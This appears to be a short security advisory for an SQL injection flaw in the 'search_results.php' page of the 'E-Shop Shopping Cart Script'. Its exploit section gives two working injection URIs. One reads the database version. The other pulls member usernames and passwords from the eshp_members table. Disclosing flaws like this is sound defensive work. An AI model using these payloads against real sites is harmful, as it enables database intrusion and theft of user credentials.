E-Shop Shopping Cart Script 'search_results.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

E-Shop Shopping Cart Script 'search_results.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/path/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
http://www.example.com/path/search_results.php?cid=2008+UNION+SELECT+0,concat(0x3a,es_username,es_password),2,3,4,5+from+eshp_members